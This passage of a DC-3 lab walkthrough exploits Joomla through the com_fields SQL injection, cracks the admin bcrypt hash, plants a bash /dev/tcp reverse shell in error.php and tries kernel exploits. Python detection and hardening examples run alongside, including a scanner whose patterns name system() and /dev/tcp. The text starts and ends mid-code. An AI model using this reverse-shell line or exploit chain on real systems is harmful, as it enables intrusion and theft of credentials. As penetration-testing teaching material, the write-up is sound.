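192.168.56.144 - - [31/May/2023:15:08:10 +0800] "GET /index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml HTTP/1.1" 500 2345 "-" "Opera/9.10 (X11; Linux i386; U; en)"
192.168.56.144 - - [31/May/2023:15:08:17 +0800] "GET /index.php?option=com_fields&view=fields&layout=modal&list%5Bfullordering%5D=%28UPDATEXML%281%2C1%2C1%29%29 HTTP/1.1" 500 2345 "-" "Opera/9.10 (X11; Linux i386; U; en)"
192.168.56.144 - - [31/May/2023:15:09:18 +0800] "GET /index.php?option=com_fields&view=fields&layout=modal&list%5Bfullordering%5D=%28SELECT%20SLEEP%281%29%29 HTTP/1.1" 500 2345 "-" "Opera/9.10 (X11; Linux i386; U; en)"
192.168.56.1 - - [31/May/2023:15:09:40 +0800] "GET /index.php/2-uncategorised/1-welcome HTTP/1.1" 200 9876 "-" "Mozilla/5.0"
192.168.56.1 - - [31/May/2023:15:09:41 +0800] "GET /administrator/index.php?option=com_fields&view=fields&list[fullordering]=a.name%20ASC HTTP/1.1" 200 9876 "-" "Mozilla/5.0"
"""

# client, timestamp, request line, status; the rest of the line is not needed here.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) '
)

# Assumption: a benign ordering value is "<column> ASC|DESC", e.g. "a.name ASC".
LEGIT_ORDERING = re.compile(r'^[A-Za-z_][A-Za-z0-9_.]* (ASC|DESC)$', re.IGNORECASE)


def ordering_value(target):
    """Decoded list[fullordering] value of a com_fields request, or None otherwise."""
    params = parse_qs(urlsplit(target).query, keep_blank_values=True)
    if params.get("option") != ["com_fields"]:
        return None
    values = params.get("list[fullordering]")
    return values[0] if values else None


def is_suspicious_ordering(value):
    """Anything that is not a plain '<column> ASC|DESC' is treated as a probe."""
    return LEGIT_ORDERING.match(value.strip()) is None


def analyze(log_text):
    """Flag suspicious ordering values and count 500s per client on com_fields."""
    flagged = []
    errors_by_ip = Counter()
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if m is None:
            continue
        value = ordering_value(m["target"])
        if value is None:
            continue
        if m["status"] == "500":
            errors_by_ip[m["ip"]] += 1
        if is_suspicious_ordering(value):
            flagged.append((m["ip"], m["ts"], value))
    return {"flagged": flagged, "errors_by_ip": errors_by_ip}


def noisy_clients(errors_by_ip, threshold=3):
    """Clients whose com_fields 500 count reaches the threshold (a burst alert)."""
    return sorted(ip for ip, n in errors_by_ip.items() if n >= threshold)


if __name__ == "__main__":
    result = analyze(SAMPLE_LOG)
    for ip, ts, value in result["flagged"]:
        print(f"{ts} {ip} suspicious list[fullordering]={value!r}")
    print("noisy clients:", noisy_clients(result["errors_by_ip"]))
```

On a real server the 500 count is the cheaper signal: a list view that normally returns 200 suddenly producing hundreds of 500s from one address is worth an alert even before the query strings are inspected.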

But if at this point you happily go to query the column names of the #__users table, you will find that you simply cannot. Why? Because Joomla's configuration file lets the administrator set a fixed prefix in front of every table name in the database, so the real table name is actually Setprefix_users. We cannot see the configuration file, so there is obviously no way to guess which prefix the administrator chose. This route has to be abandoned.
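To make both points above concrete (why sqlmap prints `#__` in every table name, and what the com_fields bug looks like at code level), here is an added Python example of my own; it is not Joomla's code. It expands the `#__` placeholder with a configured prefix, as Joomla's database layer does before a query runs, and contrasts an ORDER BY clause built straight from `list[fullordering]` with a version that accepts only an allowlisted column and direction. The prefix `d8uea_` is the one the write-up recovers later; the column allowlist and the table layout are assumptions for the demo.

```python
import sqlite3

# Assumption for the demo: the value of $dbprefix from configuration.php.
DB_PREFIX = "d8uea_"

# Hypothetical allowlist of sortable columns for the list view.
ALLOWED_COLUMNS = {"a.id", "a.title", "a.name", "a.ordering", "a.state"}
ALLOWED_DIRECTIONS = {"ASC", "DESC"}

LIST_SQL = "SELECT a.id, a.name FROM #__fields AS a ORDER BY {ordering}"


def replace_prefix(sql, prefix=DB_PREFIX):
    """Expand the '#__' placeholder into the configured table prefix."""
    return sql.replace("#__", prefix)


def build_list_query_vulnerable(fullordering):
    """Anti-pattern: the request parameter is dropped straight into ORDER BY."""
    return replace_prefix(LIST_SQL.format(ordering=fullordering))


def parse_ordering(fullordering):
    """Split '<column> <direction>' and check both parts against the allowlists."""
    parts = fullordering.strip().split()
    if len(parts) != 2:
        return None
    column, direction = parts[0], parts[1].upper()
    if column not in ALLOWED_COLUMNS or direction not in ALLOWED_DIRECTIONS:
        return None
    return column, direction


def is_accepted_ordering(fullordering):
    return parse_ordering(fullordering) is not None


def build_list_query_safe(fullordering):
    """Hardened form: only an allowlisted column and direction reach the SQL text."""
    parsed = parse_ordering(fullordering)
    if parsed is None:
        raise ValueError(f"rejected ordering value {fullordering!r}")
    column, direction = parsed
    return replace_prefix(LIST_SQL.format(ordering=f"{column} {direction}"))


def run_demo():
    """Run the safe query against an in-memory table created under the real prefix."""
    conn = sqlite3.connect(":memory:")
    conn.execute(replace_prefix("CREATE TABLE #__fields (id INTEGER, name TEXT)"))
    conn.executemany(replace_prefix("INSERT INTO #__fields VALUES (?, ?)"),
                     [(1, "zeta"), (2, "alpha")])
    rows = conn.execute(build_list_query_safe("a.name ASC")).fetchall()
    conn.close()
    return rows


if __name__ == "__main__":
    print(build_list_query_vulnerable("a.name ASC, (SELECT 1)"))  # input passes through untouched
    print(build_list_query_safe("a.name DESC"))
    print(run_demo())
```

The allowlist is the whole fix: an ORDER BY target is an identifier, not a value, so it cannot be bound as a prepared-statement parameter, and the only safe option is to refuse anything that is not one of a fixed set of known columns.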

Joomblah

Joomla actually has a dedicated exploit script, joomblah, which we can run directly against the site.

┌──(kali㉿kali)-[~/vulnhub/DC/3/workSpace]
└─$ python3 joomblah.py http://192.168.56.111

.---. .-'''-. .-'''-.
| | ' _ \ ' _ \ .---.
'---' / /` '. \ / /` '. \ __ __ ___ /| | | .
.---.. | \ ' . | \ ' | |/ `.' `. || | | .'|
| || ' | '| ' | '| .-. .-. '|| | | < |
| |\ \ / / \ \ / / | | | | | ||| __ | | __ | |
| | `. ` ..' / `. ` ..' / | | | | | |||/'__ '. | | .:--.'. | | .'''-.
| | '-...-'` '-...-'` | | | | | ||:/` '. '| |/ | \ | | |/.'''. \
| | | | | | | ||| | || |`" __ | | | / | |
| | |__| |__| |__|||\ / '| | .'.''| | | | | |
__.' ' |/'..' / '---'/ / | |_| | | |
| ' ' `'-'` \ \._,\ '/| '. | '.
|____.' `--' `" '---' '---'

[-] Fetching CSRF token
[-] Testing SQLi
- Found table: d8uea_users
- Found table: users
- Extracting users from d8uea_users
[$] Found user ['629', 'admin', 'admin', 'freddy@norealaddress.net', '$2y$10$DpfpYjADpejngxNh9GnmCeyIHCWpL97CVRnGeZsVJwR0kWFlfB1Zu', '', '']
- Extracting sessions from d8uea_session
- Extracting users from users
- Extracting sessions from session

From this we can see that the administrator set the prefix to d8uea. Most importantly, of course, we now have the admin user's password hash: $2y$10$DpfpYjADpejngxNh9GnmCeyIHCWpL97CVRnGeZsVJwR0kWFlfB1Zu

Cracking the hash

A hash starting with $2 is most likely bcrypt. Throwing it at online cracking sites got nowhere, so let's try locally.

┌──(kali㉿kali)-[~/vulnhub/DC/3/workSpace]
└─$ hashcat -O -a 0 -m 3200 '$2y$10$DpfpYjADpejngxNh9GnmCeyIHCWpL97CVRnGeZsVJwR0kWFlfB1Zu' /usr/share/wordlists/rockyou.txt
hashcat (v6.2.6) starting

OpenCL API (OpenCL 3.0 PoCL 3.1+debian Linux, None+Asserts, RELOC, SPIR, LLVM 14.0.6, SLEEF, DISTRO, POCL_DEBUG) - Platform #1 [The pocl project]
==================================================================================================================================================
* Device #1: pthread-sandybridge-Intel(R) Core(TM) i7-6700 CPU @ 3.40GHz, 2913/5890 MB (1024 MB allocatable), 8MCU

Kernel /usr/share/hashcat/OpenCL/m03200-optimized.cl:
Optimized kernel requested, but not available or not required
Falling back to pure kernel

Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 72

Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1

Optimizers applied:
* Zero-Byte
* Single-Hash
* Single-Salt

Watchdog: Temperature abort trigger set to 90c

Host memory required for this attack: 0 MB

Dictionary cache hit:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344385
* Bytes.....: 139921507
* Keyspace..: 14344385

$2y$10$DpfpYjADpejngxNh9GnmCeyIHCWpL97CVRnGeZsVJwR0kWFlfB1Zu:snoopy

Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 3200 (bcrypt $2*$, Blowfish (Unix))
Hash.Target......: $2y$10$DpfpYjADpejngxNh9GnmCeyIHCWpL97CVRnGeZsVJwR0...lfB1Zu
Time.Started.....: Wed May 31 15:35:40 2023 (3 secs)
Time.Estimated...: Wed May 31 15:35:43 2023 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........: 85 H/s (7.63ms) @ Accel:8 Loops:16 Thr:1 Vec:1
Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
Progress.........: 192/14344385 (0.00%)
Rejected.........: 0/192 (0.00%)
Restore.Point....: 128/14344385 (0.00%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:1008-1024
Candidate.Engine.: Device Generator
Candidates.#1....: carolina -> november
Hardware.Mon.#1..: Util: 87%

Started: Wed May 31 15:34:50 2023
Stopped: Wed May 31 15:35:45 2023

A quick explanation of the hashcat options: -O requests the optimized kernel (which this machine does not actually support), -a 0 selects a dictionary attack, and -m 3200 sets the hash type to bcrypt (mode 3200).

It cracked in seconds, giving the login credentials admin:snoopy.

Logged into the back end successfully. (The back-end URL was already found in the earlier scan: http://192.168.56.111/administrator/)
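To see what hashcat was actually up against, here is an added Python example (not part of the original post, and not hashcat's or Joomla's code) that splits the dumped bcrypt string into its fields and puts the numbers from the session above into perspective: the 85 H/s guess rate, the 14344385-word keyspace, and the fact that the hash fell at candidate 192. Nothing beyond the values printed on this page is assumed; the `Iteration:1008-1024` line in the hashcat status is exactly the 2^10 key-setup rounds the cost field encodes.

```python
import re
from dataclasses import dataclass

# Modular crypt format as written by PHP's password_hash() and stored by Joomla:
#   $2y$<cost>$<22-char salt><31-char digest>   (bcrypt base64 alphabet ./A-Za-z0-9)
BCRYPT_RE = re.compile(r"^\$(2[abxy]?)\$(\d{2})\$([./A-Za-z0-9]{22})([./A-Za-z0-9]{31})$")


@dataclass
class BcryptHash:
    version: str   # "2y" is the crypt_blowfish variant PHP emits
    cost: int      # work factor: key setup runs 2**cost times
    salt: str      # 22 chars = 128-bit random salt, stored in the clear
    digest: str    # 31 chars = 184 bits of the derived key


def parse_bcrypt(h: str) -> BcryptHash:
    """Split a bcrypt string into its fields; raise ValueError if the format is not bcrypt."""
    m = BCRYPT_RE.match(h)
    if not m:
        raise ValueError("not a bcrypt hash: %r" % h)
    version, cost, salt, digest = m.groups()
    return BcryptHash(version, int(cost), salt, digest)


def rounds(cost: int) -> int:
    """Number of expensive Blowfish key-setup iterations implied by the cost field."""
    return 2 ** cost


def seconds_for_candidates(candidates: int, rate_hps: float) -> float:
    """Wall-clock seconds to try `candidates` guesses against one hash at `rate_hps` guesses/s."""
    return candidates / rate_hps


def scaled_rate(rate_hps: float, from_cost: int, to_cost: int) -> float:
    """bcrypt cost is logarithmic: each +1 halves the rate an attacker gets on the same hardware."""
    return rate_hps / (2 ** (to_cost - from_cost))


# Values taken from the hashcat session on this page
PAGE_HASH = "$2y$10$DpfpYjADpejngxNh9GnmCeyIHCWpL97CVRnGeZsVJwR0kWFlfB1Zu"
PAGE_RATE_HPS = 85.0        # Speed.#1 in the status block
ROCKYOU_SIZE = 14344385     # Keyspace in the dictionary cache block
POSITION_OF_MATCH = 192     # Progress counter when the hash was recovered

if __name__ == "__main__":
    h = parse_bcrypt(PAGE_HASH)
    print("version=%s cost=%d rounds=%d salt=%s" % (h.version, h.cost, rounds(h.cost), h.salt))
    full = seconds_for_candidates(ROCKYOU_SIZE, PAGE_RATE_HPS)
    print("whole rockyou at cost 10 on this CPU: %.1f days" % (full / 86400))
    print("candidate %d reached after: %.1f s" % (POSITION_OF_MATCH,
          seconds_for_candidates(POSITION_OF_MATCH, PAGE_RATE_HPS)))
    slower = scaled_rate(PAGE_RATE_HPS, 10, 12)
    print("whole rockyou at cost 12: %.1f days" % (seconds_for_candidates(ROCKYOU_SIZE, slower) / 86400))
```

The takeaway for whoever administers a Joomla site: cost 10 makes a full rockyou run on this CPU take about two days, and raising the cost to 12 quadruples that, but neither helps when the password sits at position 192 of the wordlist. The cost factor multiplies the attacker's work per guess; only the password's position in the guess order multiplies the number of guesses.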

joomla-backend

Getting a shell from the back end

If you are familiar with the Joomla CMS you can go straight to Extensions in the top bar and navigate to Templates.

target

Then select the template currently in use, protostar.

template-template-page

Write our reverse shell into the error.php page. (The advantage of writing to the 404 page is that you don't need to work out exactly which URL serves the edited file: requesting any non-existent page triggers it.)

editting-errorpage

Simply insert a one-liner: <?php system("/bin/bash -c '/bin/bash -i >& /dev/tcp/192.168.56.144/443 0>&1'"); ?>

Shell obtained.
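From the defender's side, this step is the one that leaves the clearest trace: a template file that suddenly calls a command-execution function. As an added example (not from the original post and not Joomla's own tooling), here is a small Python scanner that flags such lines in PHP template files. The indicator list and the benign error-page fragment are constructed for this example; the tampered sample is the exact one-liner shown above.

```python
import os
import re
from typing import List, Tuple

# Constructed indicator list for this example; extend it for your own code base.
SUSPICIOUS = [
    (re.compile(r"\b(system|exec|shell_exec|passthru|popen|proc_open)\s*\("), "command execution"),
    (re.compile(r"\beval\s*\("), "dynamic code evaluation"),
    (re.compile(r"/dev/tcp/"), "bash network redirection"),
    (re.compile(r"\b(base64_decode|gzinflate|str_rot13)\s*\("), "payload decoding"),
]


def scan_php(source: str) -> List[Tuple[int, str, str]]:
    """Return (line number, indicator label, stripped line) for every suspicious line."""
    hits = []
    for lineno, line in enumerate(source.splitlines(), start=1):
        for pattern, label in SUSPICIOUS:
            if pattern.search(line):
                hits.append((lineno, label, line.strip()))
    return hits


def scan_tree(root: str) -> List[Tuple[str, int, str, str]]:
    """Walk a template tree (for example /var/www/html/templates) and scan every .php file."""
    results = []
    for dirpath, _, files in os.walk(root):
        for name in files:
            if not name.endswith(".php"):
                continue
            path = os.path.join(dirpath, name)
            with open(path, encoding="utf-8", errors="replace") as fh:
                for lineno, label, line in scan_php(fh.read()):
                    results.append((path, lineno, label, line))
    return results


# Constructed sample: a harmless fragment in the style of a Joomla template error page...
BENIGN_ERROR_PHP = """<?php
defined('_JEXEC') or die;
$app = JFactory::getApplication();
?>
<h1><?php echo $this->error->getCode(); ?></h1>
<p><?php echo htmlspecialchars($this->error->getMessage(), ENT_QUOTES, 'UTF-8'); ?></p>
"""

# ...and the same file with the one-liner from this page appended.
TAMPERED_ERROR_PHP = BENIGN_ERROR_PHP + (
    """<?php system("/bin/bash -c '/bin/bash -i >& /dev/tcp/192.168.56.144/443 0>&1'"); ?>\n"""
)

if __name__ == "__main__":
    for sample_name, sample in (("benign", BENIGN_ERROR_PHP), ("tampered", TAMPERED_ERROR_PHP)):
        for lineno, label, line in scan_php(sample):
            print("%s:%d [%s] %s" % (sample_name, lineno, label, line))
```

Run `scan_tree("/var/www/html/templates")` from cron or a file-integrity job and diff the result against the last clean run; legitimate templates almost never need `system()` or `eval()`, so any new hit is worth a look. Pair it with a check on file modification times, since the edit through the template manager also bumps the mtime of error.php.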

┌──(kali㉿kali)-[~/vulnhub/DC/3/workSpace]
└─$ sudo nc -lvp 443
listening on [any] 443 ...
192.168.56.111: inverse host lookup failed: Host name lookup failure
connect to [192.168.56.144] from (UNKNOWN) [192.168.56.111] 33186
bash: cannot set terminal process group (1183): Inappropriate ioctl for device
bash: no job control in this shell
www-data@DC-3:/var/www/html$

Privilege escalation

Manual enumeration

www-data@DC-3:/var/www/html$ uname -a
uname -a
Linux DC-3 4.4.0-21-generic #37-Ubuntu SMP Mon Apr 18 18:34:49 UTC 2016 i686 i686 i686 GNU/Linux

With some experience you can tell that kernel 4.4.0-21-generic usually has exploitable kernel vulnerabilities; if you don't know, a quick searchsploit Linux kernel 4.4 will show you. But a kernel exploit is clearly not the first choice for privilege escalation, so let's look at other things first.

www-data@DC-3:/var/www/html$ sudo -l
sudo -l
sudo: no tty present and no askpass program specified
www-data@DC-3:/var/www/html$ which python
which python
/usr/bin/python
www-data@DC-3:/var/www/html$ python -c "import pty;pty.spawn('/bin/bash')"
python -c "import pty;pty.spawn('/bin/bash')"
www-data@DC-3:/var/www/html$ sudo -l
sudo -l
[sudo] password for www-data: www-data

Sorry, try again.

www-data@DC-3:/home/dc3$ find / -type f -perm -u=s 2>/dev/null
find / -type f -perm -u=s 2>/dev/null
/bin/ping6
/bin/ntfs-3g
/bin/umount
/bin/su
/bin/fusermount
/bin/mount
/bin/ping
/usr/lib/snapd/snap-confine
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/i386-linux-gnu/lxc/lxc-user-nic
/usr/lib/openssh/ssh-keysign
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/eject/dmcrypt-get-device
/usr/bin/passwd
/usr/bin/newgidmap
/usr/bin/gpasswd
/usr/bin/sudo
/usr/bin/pkexec
/usr/bin/chsh
/usr/bin/chfn
/usr/bin/newuidmap
/usr/bin/newgrp
/usr/bin/at
www-data@DC-3:/home/dc3$ cat /etc/crontab
cat /etc/crontab
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.

SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

# m h dom mon dow user command
17 * * * * root cd / && run-parts --report /etc/cron.hourly
25 6 * * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6 * * 7 root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6 1 * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
#

Nothing noteworthy in the usual sudo, SUID and cron trio, though I did not go through the individual cron scripts in detail. It doesn't look promising, so let's look elsewhere first.

Next, look at the web application's configuration file.

www-data@DC-3:/var/www/html$ cat configuration.php
cat configuration.php
<?php
class JConfig {
public $offline = '0';
public $offline_message = 'This site is down for maintenance.<br />Please check back again soon.';
public $display_offline_message = '1';
public $offline_image = '';
public $sitename = 'DC-3';
public $editor = 'tinymce';
public $captcha = '0';
public $list_limit = '20';
public $access = '1';
public $debug = '0';
public $debug_lang = '0';
public $dbtype = 'mysqli';
public $host = 'localhost';
public $user = 'root';
public $password = 'squires';
public $db = 'joomladb';
public $dbprefix = 'd8uea_';
public $live_site = '';
public $secret = '7M6S1HqGMvt1JYkY';
public $gzip = '0';
public $error_reporting = 'default';
public $helpurl = 'https://help.joomla.org/proxy/index.php?keyref=Help{major}{minor}:{keyref}';
public $ftp_host = '127.0.0.1';
public $ftp_port = '21';
public $ftp_user = '';
public $ftp_pass = '';
public $ftp_root = '';
public $ftp_enable = '0';
public $offset = 'UTC';
public $mailonline = '1';
public $mailer = 'mail';
public $mailfrom = 'freddy@norealaddress.net';
public $fromname = 'DC-3';
public $sendmail = '/usr/sbin/sendmail';
public $smtpauth = '0';
public $smtpuser = '';
public $smtppass = '';
public $smtphost = 'localhost';
public $smtpsecure = 'none';
public $smtpport = '25';
public $caching = '0';
public $cache_handler = 'file';
public $cachetime = '15';
public $cache_platformprefix = '0';
public $MetaDesc = 'A website for DC-3';
public $MetaKeys = '';
public $MetaTitle = '1';
public $MetaAuthor = '1';
public $MetaVersion = '0';
public $robots = '';
public $sef = '1';
public $sef_rewrite = '0';
public $sef_suffix = '0';
public $unicodeslugs = '0';
public $feed_limit = '10';
public $feed_email = 'none';
public $log_path = '/var/www/html/administrator/logs';
public $tmp_path = '/var/www/html/tmp';
public $lifetime = '15';
public $session_handler = 'database';
public $shared_session = '0';
}

We find the database root user's password, squires. First try whether anyone was careless enough to reuse it (su); unfortunately not. Then check whether the database runs as root (ps aux | grep mysql); it does not.

Log in to the database and see whether there is any useful information.
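The reason a web-shell user gets the MySQL root password at all is the way this configuration.php was written, so here is an added Python example (not from the original post, not Joomla code) that parses the file's `public $name = 'value';` lines and flags the settings an administrator should not ship with. The checks and the sample excerpt are constructed for this example; the sample's values are the ones printed above.

```python
import re
from typing import Dict, List

# Joomla's configuration.php is a PHP class whose properties are single-quoted strings:
#     public $user = 'root';
JCONFIG_RE = re.compile(r"public\s+\$(\w+)\s*=\s*'((?:[^'\\]|\\.)*)'\s*;")


def parse_jconfig(source: str) -> Dict[str, str]:
    """Extract property names and values from configuration.php text."""
    return {name: value for name, value in JCONFIG_RE.findall(source)}


def audit_jconfig(cfg: Dict[str, str]) -> List[str]:
    """Return a human-readable finding for each risky setting (constructed check list)."""
    findings = []
    if cfg.get("user") == "root":
        findings.append("database user is root: the web application can read every database "
                        "and this file stores the MySQL root password; use a dedicated user "
                        "granted only on the Joomla database")
    if cfg.get("password", "") == "":
        findings.append("database password is empty")
    if cfg.get("debug") == "1":
        findings.append("debug mode is on: stack traces and queries are shown to visitors")
    if cfg.get("ftp_enable") == "1":
        findings.append("FTP layer enabled: FTP credentials are kept in clear text in this file")
    if cfg.get("secret", "") == "":
        findings.append("secret is empty: session and token generation is weakened")
    return findings


# Constructed excerpt of the configuration.php shown on this page
SAMPLE_CONFIG = """<?php
class JConfig {
    public $sitename = 'DC-3';
    public $debug = '0';
    public $dbtype = 'mysqli';
    public $host = 'localhost';
    public $user = 'root';
    public $password = 'squires';
    public $db = 'joomladb';
    public $dbprefix = 'd8uea_';
    public $secret = '7M6S1HqGMvt1JYkY';
    public $ftp_enable = '0';
    public $offline_message = 'This site is down for maintenance.<br />Please check back again soon.';
}
"""

if __name__ == "__main__":
    cfg = parse_jconfig(SAMPLE_CONFIG)
    print("db: %s@%s/%s prefix=%s" % (cfg["user"], cfg["host"], cfg["db"], cfg["dbprefix"]))
    for finding in audit_jconfig(cfg):
        print("FINDING:", finding)
```

Note that the custom d8uea_ prefix is not a control: the SQL injection earlier enumerated table names regardless of prefix. What would have limited the damage here is a database account that owns only joomladb, so that the credentials in this file could not be reused against the mysql system tables the next section pokes at.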

www-data@DC-3:/home/dc3$ mysql -uroot -p
mysql -uroot -p
Enter password: squires

Welcome to the MySQL monitor. Commands end with ; or \g.
Your MySQL connection id is 3631
Server version: 5.7.25-0ubuntu0.16.04.2 (Ubuntu)

Copyright (c) 2000, 2019, Oracle and/or its affiliates. All rights reserved.

Oracle is a registered trademark of Oracle Corporation and/or its
affiliates. Other names may be trademarks of their respective
owners.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

mysql> show databases;
show databases;
+--------------------+
| Database |
+--------------------+
| information_schema |
| joomladb |
| mysql |
| performance_schema |
| sys |
+--------------------+
5 rows in set (0.00 sec)

mysql> use mysql;
use mysql;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Database changed
mysql> show tables;
show tables;
+---------------------------+
| Tables_in_mysql |
+---------------------------+
| columns_priv |
| db |
| engine_cost |
| event |
| func |
| general_log |
| gtid_executed |
| help_category |
| help_keyword |
| help_relation |
| help_topic |
| innodb_index_stats |
| innodb_table_stats |
| ndb_binlog_index |
| plugin |
| proc |
| procs_priv |
| proxies_priv |
| server_cost |
| servers |
| slave_master_info |
| slave_relay_log_info |
| slave_worker_info |
| slow_log |
| tables_priv |
| time_zone |
| time_zone_leap_second |
| time_zone_name |
| time_zone_transition |
| time_zone_transition_type |
| user |
+---------------------------+
31 rows in set (0.00 sec)

The \g here is meant to rotate the result 90 degrees so that the column names are easier to read; without rotation the output is very hard to read.

mysql> select * from user\g;
select * from user\g;
+-----------+------------------+-------------+-------------+-------------+-------------+-------------+-----------+-------------+---------------+--------------+-----------+------------+-----------------+------------+------------+--------------+------------+-----------------------+------------------+--------------+-----------------+------------------+------------------+----------------+---------------------+--------------------+------------------+------------+--------------+------------------------+----------+------------+-------------+--------------+---------------+-------------+-----------------+----------------------+-----------------------+-------------------------------------------+------------------+-----------------------+-------------------+----------------+
| Host | User | Select_priv | Insert_priv | Update_priv | Delete_priv | Create_priv | Drop_priv | Reload_priv | Shutdown_priv | Process_priv | File_priv | Grant_priv | References_priv | Index_priv | Alter_priv | Show_db_priv | Super_priv | Create_tmp_table_priv | Lock_tables_priv | Execute_priv | Repl_slave_priv | Repl_client_priv | Create_view_priv | Show_view_priv | Create_routine_priv | Alter_routine_priv | Create_user_priv | Event_priv | Trigger_priv | Create_tablespace_priv | ssl_type | ssl_cipher | x509_issuer | x509_subject | max_questions | max_updates | max_connections | max_user_connections | plugin | authentication_string | password_expired | password_last_changed | password_lifetime | account_locked |
+-----------+------------------+-------------+-------------+-------------+-------------+-------------+-----------+-------------+---------------+--------------+-----------+------------+-----------------+------------+------------+--------------+------------+-----------------------+------------------+--------------+-----------------+------------------+------------------+----------------+---------------------+--------------------+------------------+------------+--------------+------------------------+----------+------------+-------------+--------------+---------------+-------------+-----------------+----------------------+-----------------------+-------------------------------------------+------------------+-----------------------+-------------------+----------------+
| localhost | root | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | | | | | 0 | 0 | 0 | 0 | mysql_native_password | *BFD14C8A23EF160EED3D54E16D4F5311264D0963 | N | 2019-03-23 19:31:20 | NULL | N |
| localhost | mysql.sys | N | N | N | N | N | N | N | N | N | N | N | N | N | N | N | N | N | N | N | N | N | N | N | N | N | N | N | N | N | | | | | 0 | 0 | 0 | 0 | mysql_native_password | *THISISNOTAVALIDPASSWORDTHATCANBEUSEDHERE | N | 2019-03-25 13:47:43 | NULL | Y |
| localhost | debian-sys-maint | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | | | | | 0 | 0 | 0 | 0 | mysql_native_password | *0640482736E7906211AEA47971B6C8478BA7DB4D | N | 2019-03-23 19:16:41 | NULL | N |
| localhost | mysql.session | N | N | N | N | N | N | N | N | N | N | N | N | N | N | N | Y | N | N | N | N | N | N | N | N | N | N | N | N | N | | | | | 0 | 0 | 0 | 0 | mysql_native_password | *THISISNOTAVALIDPASSWORDTHATCANBEUSEDHERE | N | 2019-03-25 13:47:42 | NULL | Y |
+-----------+------------------+-------------+-------------+-------------+-------------+-------------+-----------+-------------+---------------+--------------+-----------+------------+-----------------+------------+------------+--------------+------------+-----------------------+------------------+--------------+-----------------+------------------+------------------+----------------+---------------------+--------------------+------------------+------------+--------------+------------------------+----------+------------+-------------+--------------+---------------+-------------+-----------------+----------------------+-----------------------+-------------------------------------------+------------------+-----------------------+-------------------+----------------+
4 rows in set (0.00 sec)

ERROR:
No query specified

We are interested in the User and authentication_string columns, so query just those.

mysql> select User,authentication_string from user;
select User,authentication_string from user;
+------------------+-------------------------------------------+
| User | authentication_string |
+------------------+-------------------------------------------+
| root | *BFD14C8A23EF160EED3D54E16D4F5311264D0963 |
| mysql.sys | *THISISNOTAVALIDPASSWORDTHATCANBEUSEDHERE |
| debian-sys-maint | *0640482736E7906211AEA47971B6C8478BA7DB4D |
| mysql.session | *THISISNOTAVALIDPASSWORDTHATCANBEUSEDHERE |
+------------------+-------------------------------------------+
4 rows in set (0.00 sec)

Here the author hints THIS IS NOT A VALID PASSWORD THAT CAN BE USED HERE, telling us this is irrelevant. So this path is a dead end as well.

Kernel privilege escalation

At this point manual enumeration has turned up no quick win, so we fall back to the blunt approach.

First try Dirty COW:

www-data@DC-3:/tmp/test$ gcc -pthread 40839.c -o dirty -lcrypt
gcc -pthread 40839.c -o dirty -lcrypt
www-data@DC-3:/tmp/test$ ./dirty
./dirty
Please enter the new password: password

No response; checking the VM shows it has died. Dirty COW successfully crashed it.

This is exactly why kernel exploits should not be the first step in privilege escalation: they can easily take the machine down.

I tried several others: 40049.c, 40839.c, 40871.c, 42033.txt, 44300.c, 45010.c; none succeeded.

It wasn't until ebpf_mapfd_doubleput that it worked. Just follow its instructions (the compiler warnings don't matter).
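Two things a defender can check on a box like this before anyone reaches for a kernel exploit: whether the running kernel ABI is behind the distribution's patched build, and whether unprivileged users can even reach the bpf() syscall. Here is an added Python example (not part of the original post or of the exploit's tarball) that parses the `uname -a` line shown above and a `sysctl kernel.unprivileged_bpf_disabled` line into those two findings. The `4.4.0-22-generic` reference release is a placeholder to show the comparison, not the actual fixed version; substitute the build from your distribution's advisory.

```python
import re
from typing import List, Tuple

# Ubuntu kernel release strings look like 4.4.0-21-generic: upstream version, ABI number, flavour.
UNAME_RELEASE_RE = re.compile(r"^(\d+)\.(\d+)\.(\d+)-(\d+)-(\w+)$")


def parse_ubuntu_release(release: str) -> Tuple[int, int, int, int, str]:
    """Split '4.4.0-21-generic' into (major, minor, patch, abi, flavour)."""
    m = UNAME_RELEASE_RE.match(release.strip())
    if not m:
        raise ValueError("unrecognised Ubuntu kernel release: %r" % release)
    major, minor, patch, abi, flavour = m.groups()
    return int(major), int(minor), int(patch), int(abi), flavour


def release_from_uname(uname_a: str) -> str:
    """Pull the release field (third token) out of a full `uname -a` line."""
    return uname_a.split()[2]


def older_than(release: str, reference: str) -> bool:
    """True if `release` is an earlier Ubuntu build than `reference` (flavour ignored)."""
    return parse_ubuntu_release(release)[:4] < parse_ubuntu_release(reference)[:4]


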